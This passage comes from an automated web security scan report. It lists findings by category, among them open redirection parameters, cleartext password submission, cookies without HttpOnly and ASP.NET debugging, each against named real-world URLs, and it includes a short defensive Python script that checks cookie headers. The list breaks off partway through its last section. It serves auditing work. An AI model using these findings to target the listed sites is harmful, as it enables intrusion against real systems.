7.370. http://www.scott-sports.com/crossdomain.xml

7.371. http://www.tapout.com/crossdomain.xml

7.372. http://www.theworldsbestever.com/crossdomain.xml

7.373. http://www.treknature.com/crossdomain.xml

7.374. http://www.twinspires.com/crossdomain.xml

7.375. http://www.ucc.org/crossdomain.xml

7.376. http://www.usmc-mccs.org/crossdomain.xml

7.377. http://www.uvaldeleadernews.com/crossdomain.xml

7.378. http://www.veenx.com/crossdomain.xml

7.379. http://www.wacotribcars.com/crossdomain.xml

7.380. http://www.weather.com.cn/crossdomain.xml

7.381. http://www.webreserv.com/crossdomain.xml

7.382. http://www.wheel-visualizer.com/crossdomain.xml

7.383. http://www.widescreengamingforum.com/crossdomain.xml

7.384. http://www.wiscnews.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

8.3. http://pixel.33across.com/clientaccesspolicy.xml

8.4. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

8.5. http://www.arkansasrazorbacks.com/clientaccesspolicy.xml

8.6. http://www.cubuffs.com/clientaccesspolicy.xml

8.7. http://www.cycling.tv/clientaccesspolicy.xml

8.8. http://www.cyclones.com/clientaccesspolicy.xml

8.9. http://www.nbcolympics.com/clientaccesspolicy.xml

8.10. http://www.tv2.no/clientaccesspolicy.xml

8.11. http://www.virginiasports.com/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://beam.to/login.asp

9.2. http://www.choicehotels.ca/favicon.ico

9.3. http://www.homedepotmoving.com/favicon.ico

9.4. http://www.idahopower.com/favicon.ico

9.5. http://www.lol-jokes.com/favicon.ico

9.6. http://www.radarsync.com/favicon.ico

9.7. http://www.radarsync.com/favicon.ico

9.8. http://www.restaurantrow.com/favicon.ico

9.9. http://www.se-t.net/favicon.ico

9.10. http://www.superherorelease.com/favicon.ico

10. Session token in URL

10.1. http://www.thehealthplan.com/favicon.ico

10.2. http://www.vc.edu/favicon.ico

11. Password field submitted using GET method

11.1. http://beam.to/login.asp

11.2. http://www.radarsync.com/favicon.ico

12. ASP.NET ViewState without MAC enabled

13. Open redirection

13.1. http://p.brilig.com/contact/bct [REDIR parameter]

13.2. http://server.iad.liveperson.net/hc/15614964/ [imageUrl parameter]

13.3. http://www.researchbynet.com/favicon.ico [name of an arbitrarily supplied request parameter]

14. Cookie scoped to parent domain

14.1. http://api.twitter.com/1/statuses/user_timeline.json

14.2. http://www.bodybyvi.com/favicon.ico

14.3. http://www.cowboom.com/favicon.ico

14.4. http://www.dairylandauto.com/favicon.ico

14.5. http://www.enginebuildermag.com/favicon.ico

14.6. http://www.nobelcom.com/favicon.ico

14.7. http://www.thehealthplan.com/favicon.ico

14.8. http://admeld.adnxs.com/usersync

14.9. http://b.scorecardresearch.com/b

14.10. http://cspix.media6degrees.com/orbserv/hbpix

14.11. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json

14.12. http://news.cnet.com/webware/

14.13. http://ping.crowdscience.com/ping.js

14.14. http://pix04.revsci.net/K05540/b3/0/3/1003161/695265068.js

14.15. http://pixel.33across.com/ps/

14.16. http://pixel.quantserve.com/pixel

14.17. http://tags.bluekai.com/site/3327

14.18. http://www.ally.ca/favicon.ico

14.19. http://www.bike.com/favicon.ico

14.20. http://www.bizsiteservice.com/favicon.ico

14.21. http://www.customclassictrucks.com/favicon.ico

14.22. http://www.diamond.com/favicon.ico

14.23. http://www.garden.com/favicon.ico

14.24. http://www.hlj.com/favicon.ico

14.25. http://www.intellichoice.com/favicon.ico

14.26. http://www.isound.com/favicon.ico

14.27. http://www.kidfanatics.com/favicon.ico

14.28. http://www.krcrtv.com/favicon.ico

14.29. http://www.leaderinsurance.com/favicon.ico

14.30. http://www.miami-dadeclerk.com/favicon.ico

14.31. http://www.musclemustangfastfords.com/favicon.ico

14.32. http://www.mustang50magazine.com/favicon.ico

14.33. http://www.pets-seo-services.com/favicon.ico

14.34. http://www.quantumjumping.com/blog/

14.35. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

14.36. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

14.37. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php

14.38. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php

14.39. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

14.40. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

14.41. http://www.quiltersclubofamerica.com/favicon.ico

14.42. http://www.quintura.com/favicon.ico

14.43. http://www.reevoo.com/favicon.ico

14.44. http://www.sescoops.com/favicon.ico

14.45. http://www.sportrider.com/favicon.ico

14.46. http://www.st.com/favicon.ico

14.47. http://www.staralliance.com/favicon.ico

14.48. http://www.streetrodderweb.com/favicon.ico

14.49. http://www.thefreeiqtest.org/favicon.ico

14.50. http://www.tutorialblog.org/favicon.ico

14.51. http://www.whitepages.ca/favicon.ico

14.52. http://xcdn.xgraph.net/15530/db/xg.gif

15. Cookie without HttpOnly flag set

15.1. http://beam.to/index.asp

15.2. http://tracking.moon-ray.com/track.php

15.3. http://www.670kboi.com/favicon.ico

15.4. http://www.aacounty.org/favicon.ico

15.5. http://www.alaskaaircruises.com/favicon.ico

15.6. http://www.auristechnology.com/favicon.ico

15.7. http://www.battleformarriage.net/favicon.ico

15.8. http://www.bauerfinancial.com/favicon.ico

15.9. http://www.blackmonchevrolet.com/favicon.ico

15.10. http://www.bodybyvi.com/favicon.ico

15.11. http://www.brainshark.com/favicon.ico

15.12. http://www.bravocompanyusa.com/favicon.ico

15.13. http://www.brightwurks.com/monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/

15.14. http://www.burntorangereport.com/favicon.ico

15.15. http://www.carleasingsecrets.com/favicon.ico

15.16. http://www.ccbg.com/favicon.ico

15.17. http://www.cellphoneaccents.com/favicon.ico

15.18. http://www.cheapbandgear.com/favicon.ico

15.19. http://www.chickensoup.com/favicon.ico

15.20. http://www.childrens.com/favicon.ico

15.21. http://www.cruiseone.com/favicon.ico

15.22. http://www.dairylandauto.com/favicon.ico

15.23. http://www.dedicatedserverdir.com/favicon.ico

15.24. http://www.democratsenators.org/favicon.ico

15.25. http://www.directbuytire.com/favicon.ico

15.26. http://www.disaboom.com/favicon.ico

15.27. http://www.durangoherald.com/favicon.ico

15.28. http://www.egyptair.com/favicon.ico

15.29. http://www.engcen.com/favicon.ico

15.30. http://www.essedive.com/favicon.ico

15.31. http://www.expertrating.com/favicon.ico

15.32. http://www.family.org/favicon.ico

15.33. http://www.fancydress.com/favicon.ico

15.34. http://www.fhainfo.com/favicon.ico

15.35. http://www.henryfields.com/favicon.ico

15.36. http://www.hitsyndication.com/favicon.ico

15.37. http://www.hotelguide.com/favicon.ico

15.38. http://www.hottiearcade.com/favicon.ico

15.39. http://www.hughesnet60.com/favicon.ico

15.40. http://www.huntermtn.com/favicon.ico

15.41. http://www.imagepix.org/favicon.ico

15.42. http://www.imshopping.com/favicon.ico

15.43. http://www.inautix.com/favicon.ico

15.44. http://www.infowarsshop.com/favicon.ico

15.45. http://www.instrumentalsavings.com/favicon.ico

15.46. http://www.jcpenneyoptical.com/favicon.ico

15.47. http://www.kgoam810.com/favicon.ico

15.48. http://www.kontrolfreek.com/favicon.ico

15.49. http://www.linkchina.com/favicon.ico

15.50. http://www.lol-jokes.com/favicon.ico

15.51. http://www.mountainwestbank.com/favicon.ico

15.52. http://www.musi-c-lips.com/favicon.ico

15.53. http://www.mybusinesslisting.com/favicon.ico

15.54. http://www.nobelcom.com/favicon.ico

15.55. http://www.ocinkjet.com/favicon.ico

15.56. http://www.ohioslargestplayground.com/favicon.ico

15.57. http://www.phonesale.com/favicon.ico

15.58. http://www.plantdelights.com/favicon.ico

15.59. http://www.publicus.com/favicon.ico

15.60. http://www.pull-ups.com/favicon.ico

15.61. http://www.rsdynamic.ru/favicon.ico

15.62. http://www.saasdir.com/favicon.ico

15.63. http://www.sdstate.edu/favicon.ico

15.64. http://www.sepw.com/favicon.ico

15.65. http://www.smiletrain.org/favicon.ico

15.66. http://www.stellarone.com/favicon.ico

15.67. http://www.tableclothsfactory.com/favicon.ico

15.68. http://www.teacherjobnet.org/favicon.ico

15.69. http://www.tel3advantage.com/favicon.ico

15.70. http://www.theamericanmonk.com/members/forgot-password

15.71. http://www.thehealthplan.com/favicon.ico

15.72. http://www.thescriptmusic.com/favicon.ico

15.73. http://www.thirdworldpass.com/favicon.ico

15.74. http://www.usairwayscruises.com/favicon.ico

15.75. http://www.vc.edu/favicon.ico

15.76. http://www.waldameer.com/favicon.ico

15.77. http://www.webindia123.com/favicon.ico

15.78. http://www.webreserv.com/favicon.ico

15.79. http://www.westonsupply.com/favicon.ico

15.80. http://www.wholesalefashionsquare.com/favicon.ico

15.81. http://www.wjr.com/favicon.ico

15.82. http://ad.yieldmanager.com/pixel

15.83. http://ad.yieldmanager.com/unpixel

15.84. http://api.twitter.com/1/statuses/user_timeline.json

15.85. http://b.scorecardresearch.com/b

15.86. http://cspix.media6degrees.com/orbserv/hbpix

15.87. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json

15.88. http://news.cnet.com/webware/

15.89. http://p.brilig.com/contact/bct

15.90. http://ping.crowdscience.com/ping.js

15.91. http://pix04.revsci.net/K05540/b3/0/3/1003161/695265068.js

15.92. http://pixel.33across.com/ps/

15.93. http://pixel.quantserve.com/pixel

15.94. http://tags.bluekai.com/site/3327

15.95. http://www.975thefanatic.com/favicon.ico

15.96. http://www.accessdubuque.com/favicon.ico

15.97. http://www.acninc.com/favicon.ico

15.98. http://www.agriculture.com/favicon.ico

15.99. http://www.aikenstandard.com/favicon.ico

15.100. http://www.allentate.com/favicon.ico

15.101. http://www.ally.ca/favicon.ico

15.102. http://www.ambiencr.com/favicon.ico

15.103. http://www.ardenb.com/favicon.ico

15.104. http://www.ataglance.com/favicon.ico

15.105. http://www.autorepairlocal.com/favicon.ico

15.106. http://www.autotraderlatino.com/favicon.ico

15.107. http://www.awardhq.com/favicon.ico

15.108. http://www.azdventuresbooks.com/favicon.ico

15.109. http://www.backinthesaddle.com/favicon.ico

15.110. http://www.bandai.com/favicon.ico

15.111. http://www.bhgrealestate.com/favicon.ico

15.112. http://www.bike.com/favicon.ico

15.113. http://www.bluecrossma.com/favicon.ico

15.114. http://www.bystolic.com/favicon.ico

15.115. http://www.calltrackingportal.com/favicon.ico

15.116. http://www.cartoonnetworkasia.com/favicon.ico

15.117. http://www.cbburnet.com/favicon.ico

15.118. http://www.celebsquares.com/favicon.ico

15.119. http://www.chaoticgame.com/favicon.ico

15.120. http://www.chaparral-racing.com/favicon.ico

15.121. http://www.chop.edu/favicon.ico

15.122. http://www.cmphotocenter.com/favicon.ico

15.123. http://www.codigobarras.com/favicon.ico

15.124. http://www.coldwellbankermoves.com/favicon.ico

15.125. http://www.commtrans.org/favicon.ico

15.126. http://www.consumerexpressions.com/favicon.ico

15.127. http://www.cowboom.com/favicon.ico

15.128. http://www.creditacceptance.com/favicon.ico

15.129. http://www.creditimprovers.net/favicon.ico

15.130. http://www.crohnsonline.com/favicon.ico

15.131. http://www.cslplasma.com/favicon.ico

15.132. http://www.customclassictrucks.com/favicon.ico

15.133. http://www.datamark.com/favicon.ico

15.134. http://www.daykick.com/favicon.ico

15.135. http://www.diamond.com/favicon.ico

15.136. http://www.dinnerplates.com/favicon.ico

15.137. http://www.edfinancial.com/favicon.ico

15.138. http://www.efolks.com/favicon.ico

15.139. http://www.embroiderydesigns.com/favicon.ico

15.140. http://www.ferrellgas.com/favicon.ico

15.141. http://www.findaproperty.com/favicon.ico

15.142. http://www.finn.no/favicon.ico

15.143. http://www.fordforum.com/favicon.ico

15.144. http://www.freemdeicalin.com/favicon.ico

15.145. http://www.garden.com/favicon.ico

15.146. http://www.gemvara.com/favicon.ico

15.147. http://www.gmaccessorieszone.com/favicon.ico

15.148. http://www.goestores.com/favicon.ico

15.149. http://www.goinsurancerates.com/favicon.ico

15.150. http://www.greentreepayday.com/favicon.ico

15.151. http://www.guesssms.com/favicon.ico

15.152. http://www.handson.com/favicon.ico

15.153. http://www.healthwealthraffle.org/favicon.ico

15.154. http://www.hear-there.com/favicon.ico

15.155. http://www.helpwithmybank.gov/favicon.ico

15.156. http://www.henryford.com/favicon.ico

15.157. http://www.heralddemocrat.com/favicon.ico

15.158. http://www.hlj.com/favicon.ico

15.159. http://www.homeschoolreviews.com/favicon.ico

15.160. http://www.hondacivicforum.com/favicon.ico

15.161. http://www.horizon-bcbsnj.com/favicon.ico

15.162. http://www.hrmorning.com/favicon.ico

15.163. http://www.iccsafe.org/favicon.ico

15.164. http://www.icing.com/favicon.ico

15.165. http://www.idahopower.com/favicon.ico

15.166. http://www.indiebound.org/favicon.ico

15.167. http://www.intellichoice.com/favicon.ico

15.168. http://www.ip-lookup.net/favicon.ico

15.169. http://www.isound.com/favicon.ico

15.170. http://www.jacksonhewitt.com/favicon.ico

15.171. http://www.jobilephones.com/favicon.ico

15.172. http://www.jpeterman.com/favicon.ico

15.173. http://www.jtvauctions.com/favicon.ico

15.174. http://www.kennedyspacecenter.com/favicon.ico

15.175. http://www.kidfanatics.com/favicon.ico

15.176. http://www.kisw.com/favicon.ico

15.177. http://www.krcrtv.com/favicon.ico

15.178. http://www.ksfcu.org/favicon.ico

15.179. http://www.kvh.com/favicon.ico

15.180. http://www.leaderinsurance.com/favicon.ico

15.181. http://www.learnatest.com/favicon.ico

15.182. http://www.leoncountyfl.gov/favicon.ico

15.183. http://www.lexingtonlaw.com/favicon.ico

15.184. http://www.lifestreetmedia.com/favicon.ico

15.185. http://www.loan.com/favicon.ico

15.186. http://www.longabergerhomesteadstore.com/favicon.ico

15.187. http://www.lrn.com/favicon.ico

15.188. http://www.macmillanmh.com/favicon.ico

15.189. http://www.manhunt.com/favicon.ico

15.190. http://www.marriottvacationclub.com/favicon.ico

15.191. http://www.mctennessee.com/favicon.ico

15.192. http://www.meandmylatina.com/favicon.ico

15.193. http://www.meaningfulbeauty.com/favicon.ico

15.194. http://www.medhunters.com/favicon.ico

15.195. http://www.mem.com/favicon.ico

15.196. http://www.meridianschools.org/favicon.ico

15.197. http://www.miami-dadeclerk.com/favicon.ico

15.198. http://www.mibcn.com/favicon.ico

15.199. http://www.michie.com/favicon.ico

15.200. http://www.microgaming.com/favicon.ico

15.201. http://www.midmichigan.org/favicon.ico

15.202. http://www.misscellania.com/favicon.ico

15.203. http://www.mizunousa.com/favicon.ico

15.204. http://www.moreplatformbeds.com/favicon.ico

15.205. http://www.musclemustangfastfords.com/favicon.ico

15.206. http://www.mustang50magazine.com/favicon.ico

15.207. http://www.mypicturetown.com/favicon.ico

15.208. http://www.mypilotstore.com/favicon.ico

15.209. http://www.myskillstutor.com/favicon.ico

15.210. http://www.nationalexpress.com/favicon.ico

15.211. http://www.netitmail.net/favicon.ico

15.212. http://www.northamericanmotoring.com/favicon.ico

15.213. http://www.nursingcenter.com/favicon.ico

15.214. http://www.nuveen.com/favicon.ico

15.215. http://www.ocfl.net/favicon.ico

15.216. http://www.oecd.org/favicon.ico

15.217. http://www.ohloh.net/favicon.ico

15.218. http://www.opt-intelligence.com/favicon.ico

15.219. http://www.optimahealth.com/favicon.ico

15.220. http://www.oxforddictionaries.com/favicon.ico

15.221. http://www.pahomepage.com/favicon.ico

15.222. http://www.paintball-online.com/favicon.ico

15.223. http://www.paulmccartney.com/favicon.ico

15.224. http://www.pavilionconcerts.com/favicon.ico

15.225. http://www.pets-seo-services.com/favicon.ico

15.226. http://www.photos-naturistes.fr/favicon.ico

15.227. http://www.ppg.com/favicon.ico

15.228. http://www.propertyminder.com/favicon.ico

15.229. http://www.quantumjumping.com/

15.230. http://www.quantumjumping.com/blog/

15.231. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

15.232. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

15.233. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php

15.234. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php

15.235. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

15.236. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

15.237. http://www.quantumjumping.com/customers/support/article

15.238. http://www.quantumjumping.com/media/themes/images/a/call.png

15.239. http://www.quiltedparadise.com/favicon.ico

15.240. http://www.quiltersclubofamerica.com/favicon.ico

15.241. http://www.quintura.com/favicon.ico

15.242. http://www.quotit.net/favicon.ico

15.243. http://www.rayovac.com/favicon.ico

15.244. http://www.realhog.com/favicon.ico

15.245. http://www.realitystarscandals.com/favicon.ico

15.246. http://www.reevoo.com/favicon.ico

15.247. http://www.ringling.com/favicon.ico

15.248. http://www.rotary.org/favicon.ico

15.249. http://www.sandicor.com/favicon.ico

15.250. http://www.schneider.com/favicon.ico

15.251. http://www.schoolspecialtyonline.net/favicon.ico

15.252. http://www.sescoops.com/favicon.ico

15.253. http://www.sonyclassics.com/favicon.ico

15.254. http://www.sportrider.com/favicon.ico

15.255. http://www.st.com/favicon.ico

15.256. http://www.standardpacifichomes.com/favicon.ico

15.257. http://www.staralliance.com/favicon.ico

15.258. http://www.statoil.com/favicon.ico

15.259. http://www.streetrodderweb.com/favicon.ico

15.260. http://www.thedjlist.com/favicon.ico

15.261. http://www.thefreeiqtest.org/favicon.ico

15.262. http://www.thehawkeye.com/favicon.ico

15.263. http://www.thehorrordome.com/favicon.ico

15.264. http://www.thepersonalcarecatalog.com/favicon.ico

15.265. http://www.thesportsgearcatalog.com/favicon.ico

15.266. http://www.tickettoread.com/favicon.ico

15.267. http://www.timewarnercableoffers.com/favicon.ico

15.268. http://www.trade-schools.net/favicon.ico

15.269. http://www.trails-end.com/favicon.ico

15.270. http://www.tristatehomepage.com/favicon.ico

15.271. http://www.truewoman.com/

15.272. http://www.truewoman.com/favicon.ic

15.273. http://www.tunewiki.com/favicon.ico

15.274. http://www.tutorialblog.org/favicon.ico

15.275. http://www.uhaulhr.com/favicon.ico

15.276. http://www.vegasview.com/favicon.ico

15.277. http://www.virginhealthmiles.com/favicon.ico

15.278. http://www.vitamin-insight.com/favicon.ico

15.279. http://www.votigo.com/favicon.ico

15.280. http://www.wben.com/favicon.ico

15.281. http://www.weather.com.cn/favicon.ico

15.282. http://www.whatshehastosay.com/favicon.ico

15.283. http://www.whitepages.ca/favicon.ico

15.284. http://www.williams.edu/favicon.ico

15.285. http://www.woman-and-beast.com/favicon.ico

15.286. http://www.wor710.com/favicon.ico

15.287. http://www.worden.com/favicon.ico

15.288. http://www.xteenultra.com/favicon.ico

15.289. http://www.yellowairplane.com/favicon.ico

15.290. http://www.zimbra.com/favicon.ico

15.291. http://xcdn.xgraph.net/15530/db/xg.gif
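Sections 14 and 15 list responses whose Set-Cookie header either scopes the cookie to a parent domain or omits the HttpOnly flag. The report gives only the URLs, not the headers, so the check below is an added example written for this report, not scanner output or code from any listed site; the two Set-Cookie values and the hostnames in it are constructed samples. It reproduces the two checks the scanner applies (HttpOnly absent; Domain attribute naming a parent of the responding host) and adds the Secure-flag check a reviewer would run alongside them.

```python
def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_set_cookie(header_value, response_host, https):
    """Return findings for one Set-Cookie header from response_host."""
    name, _value, attrs = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attrs:
        findings.append("%s: no HttpOnly flag; script on the page can read it" % name)
    if https and "secure" not in attrs:
        findings.append("%s: no Secure flag; sent over cleartext HTTP too" % name)
    # RFC 6265: a leading dot in the Domain attribute is ignored.
    domain = attrs.get("domain", "").lstrip(".").lower()
    host = response_host.lower()
    if domain and domain != host and host.endswith("." + domain):
        findings.append("%s: Domain=%s scopes the cookie to the parent domain; every host under it receives it" % (name, domain))
    return findings


# Constructed sample responses (hypothetical hosts, not from the report).
SAMPLE_RESPONSES = [
    ("www.example.com", False, "ASPSESSIONID=abc123; path=/"),
    ("www.example.com", True, "sid=deadbeef; Domain=.example.com; Path=/; Secure; HttpOnly"),
]


def audit_samples():
    """Run the audit over SAMPLE_RESPONSES and return all findings."""
    results = []
    for host, https, header in SAMPLE_RESPONSES:
        results.extend(audit_set_cookie(header, host, https))
    return results


if __name__ == "__main__":
    for finding in audit_samples():
        print(finding)
```

Most of the third-party entries in section 14 (ad pixels, user-sync endpoints) set parent-domain cookies on purpose, since the tracking cookie must be shared across the vendor's hosts; the finding is worth acting on for the first-party session cookies such as the ASP session identifiers, where a cookie readable by script or by a sibling subdomain is a session-hijacking path.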

16. Password field with autocomplete enabled

16.1. http://beam.to/login.asp

16.2. http://www.choicehotels.ca/favicon.ico

16.3. http://www.homedepotmoving.com/favicon.ico

16.4. http://www.lol-jokes.com/favicon.ico

16.5. http://www.nobelcom.com/favicon.ico

16.6. http://www.radarsync.com/favicon.ico

16.7. http://www.radarsync.com/favicon.ico

16.8. http://www.restaurantrow.com/favicon.ico

16.9. http://www.se-t.net/favicon.ico

16.10. http://www.superherorelease.com/favicon.ico

16.11. http://www.thehealthplan.com/favicon.ico

17. Source code disclosure

17.1. http://www.fellowes.com/favicon.ico

17.2. http://www.virginialottery.com/favicon.ico

18. ASP.NET debugging enabled

18.1. http://4qinvite.4q.iperceptions.com/Default.aspx

18.2. http://km6633.keymetric.net/Default.aspx

18.3. http://www.211.org/Default.aspx

18.4. http://www.alzheimersrxtreatment.com/Default.aspx

18.5. http://www.applytracking.com/Default.aspx

18.6. http://www.awsedr.com/Default.aspx

18.7. http://www.bodybyvi.com/Default.aspx

18.8. http://www.booktv.org/Default.aspx

18.9. http://www.breederscup.com/Default.aspx

18.10. http://www.bystolic.com/Default.aspx

18.11. http://www.cern.ch/Default.aspx

18.12. http://www.childrens.com/Default.aspx

18.13. http://www.consumerdemocracy.com/Default.aspx

18.14. http://www.cpllabs.com/Default.aspx

18.15. http://www.creditacceptance.com/Default.aspx

18.16. http://www.crimcheck.com/Default.aspx

18.17. http://www.crohnsonline.com/Default.aspx

18.18. http://www.cupchimerical.com/Default.aspx

18.19. http://www.dutyfreeaffiliates.com/Default.aspx

18.20. http://www.dvdnow.net/Default.aspx

18.21. http://www.e-resume.us/Default.aspx

18.22. http://www.ecndigitaledition.com/Default.aspx

18.23. http://www.elpasoco.com/Default.aspx

18.24. http://www.embark.com/Default.aspx

18.25. http://www.endlessvacation.com/Default.aspx

18.26. http://www.exite-listings.com/Default.aspx

18.27. http://www.fiserv.com/Default.aspx

18.28. http://www.gottashopdeals.com/Default.aspx

18.29. http://www.hondapartshouse.com/Default.aspx

18.30. http://www.housefabric.com/Default.aspx

18.31. http://www.icing.com/Default.aspx

18.32. http://www.ies-co.com/Default.aspx

18.33. http://www.integrativelogic.com/Default.aspx

18.34. http://www.kawasakipartshouse.com/Default.aspx

18.35. http://www.kleinisd.net/Default.aspx

18.36. http://www.lockridgehomes.com/Default.aspx

18.37. http://www.lostmoneylocators.info/Default.aspx

18.38. http://www.michigan-energy.org/Default.aspx

18.39. http://www.moreplatformbeds.com/Default.aspx

18.40. http://www.motion-vr.net/Default.aspx

18.41. http://www.onlyconstructionjobs.com/Default.aspx

18.42. http://www.parsons.com/Default.aspx

18.43. http://www.pickupplease.org/Default.aspx

18.44. http://www.planbonestep.com/Default.aspx

18.45. http://www.pnf.com/Default.aspx

18.46. http://www.pristiq.com/Default.aspx

18.47. http://www.pull-ups.com/Default.aspx

18.48. http://www.qtwebgroup.com/Default.aspx

18.49. http://www.resumesstarthere.com/Default.aspx

18.50. http://www.ritasice.com/Default.aspx

18.51. http://www.roundrockisd.org/Default.aspx

18.52. http://www.roundtablepizza.com/Default.aspx

18.53. http://www.royal.gov.uk/Default.aspx

18.54. http://www.searchfreefonts.com/Default.aspx

18.55. http://www.seedsavers.org/Default.aspx

18.56. http://www.shop-insectlore.com/Default.aspx

18.57. http://www.shoptheseasons.com/Default.aspx

18.58. http://www.snipercountry.com/Default.aspx

18.59. http://www.sonichealthcareusa.com/Default.aspx

18.60. http://www.sonoraquest.com/Default.aspx

18.61. http://www.stoopcreche.com/Default.aspx

18.62. http://www.stoopsalad.com/Default.aspx

18.63. http://www.supermodels.nl/Default.aspx

18.64. http://www.suppress003.com/Default.aspx

18.65. http://www.textcaster.com/Default.aspx

18.66. http://www.thehenryford.org/Default.aspx

18.67. http://www.tmkrms.com/Default.aspx

18.68. http://www.totallymoney.com/Default.aspx

18.69. http://www.trackairy.com/Default.aspx

18.70. http://www.trackzz.com/Default.aspx

18.71. http://www.traitset.com/Default.aspx

18.72. http://www.tri-c.edu/Default.aspx

18.73. http://www.trojancondoms.com/Default.aspx

18.74. http://www.usadiscounters.net/Default.aspx

18.75. http://www.wellsfargoadvisorsinfo.com/Default.aspx

18.76. http://www.yamahapartshouse.com/Default.aspx

18.77. http://www.zig5.com/Default.aspx

19. Referer-dependent response

19.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2

19.2. http://api.twitter.com/1/statuses/user_timeline.json

19.3. http://www.facebook.com/plugins/like.php

19.4. http://www.quantumjumping.com/

19.5. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

19.6. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

19.7. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

19.8. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

20. Cross-domain POST

20.1. http://www.medicalcareersdirect.com/favicon.ico

20.2. http://www.quantumjumping.com/

20.3. http://www.quantumjumping.com/

20.4. http://www.quantumjumping.com/

20.5. http://www.quantumjumping.com/blog/

20.6. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

20.7. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

20.8. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

20.9. http://www.theamericanmonk.com/

20.10. http://www.theamericanmonk.com/

21. Cross-domain Referer leakage

21.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2

21.2. http://admeld.adnxs.com/usersync

21.3. http://mads.cnet.com/mac-ad

21.4. http://pixel.invitemedia.com/admeld_sync

21.5. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf

21.6. http://www.facebook.com/plugins/facepile.php

21.7. http://www.facebook.com/plugins/fan.php

21.8. http://www.facebook.com/plugins/like.php

21.9. http://www.facebook.com/plugins/likebox.php

21.10. http://www.facebook.com/plugins/likebox.php

21.11. http://www.quantumjumping.com/

21.12. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

21.13. http://www.quantumjumping.com/contact/view

21.14. http://www.quantumjumping.com/customers/support/article

21.15. http://www.truewoman.com/

21.16. http://www.truewoman.com/

22. Cross-domain script include

22.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2

22.2. http://beam.to/login.asp

22.3. http://beam.to/start.asp

22.4. http://news.cnet.com/webware/

22.5. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf

22.6. http://www.aacounty.org/favicon.ico

22.7. http://www.aligngi.com/favicon.ico

22.8. http://www.battleformarriage.net/favicon.ico

22.9. http://www.brightwurks.com/monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/

22.10. http://www.buckmasters.com/favicon.ico

22.11. http://www.capitolhillseattle.com/favicon.ico

22.12. http://www.cellphoneaccents.com/favicon.ico

22.13. http://www.chickensoup.com/favicon.ico

22.14. http://www.cowboom.com/favicon.ico

22.15. http://www.engcen.com/favicon.ico

22.16. http://www.ericksonliving.com/favicon.ico

22.17. http://www.facebook.com/plugins/facepile.php

22.18. http://www.facebook.com/plugins/fan.php

22.19. http://www.facebook.com/plugins/like.php

22.20. http://www.facebook.com/plugins/likebox.php

22.21. http://www.fhainfo.com/favicon.ico

22.22. http://www.fiserv.com/favicon.ico

22.23. http://www.halstead.com/favicon.ico

22.24. http://www.herbalessences.com/favicon.ico

22.25. http://www.heredomination.com/favicon.ico

22.26. http://www.herenextdoor.tv/favicon.ico

22.27. http://www.hereteens.tv/favicon.ico

22.28. http://www.homedepotmoving.com/favicon.ico

22.29. http://www.homeschoolreviews.com/favicon.ico

22.30. http://www.huntermtn.com/favicon.ico

22.31. http://www.inautix.com/favicon.ico

22.32. http://www.kontrolfreek.com/favicon.ico

22.33. http://www.linkchina.com/favicon.ico

22.34. http://www.livewellhd.com/favicon.ico

22.35. http://www.lol-jokes.com/favicon.ico

22.36. http://www.marriottvacationclub.com/favicon.ico

22.37. http://www.medicalcareersdirect.com/favicon.ico

22.38. http://www.moreplatformbeds.com/favicon.ico

22.39. http://www.motorracingnetwork.com/favicon.ico

22.40. http://www.mrclean.com/favicon.ico

22.41. http://www.mybusinesslisting.com/favicon.ico

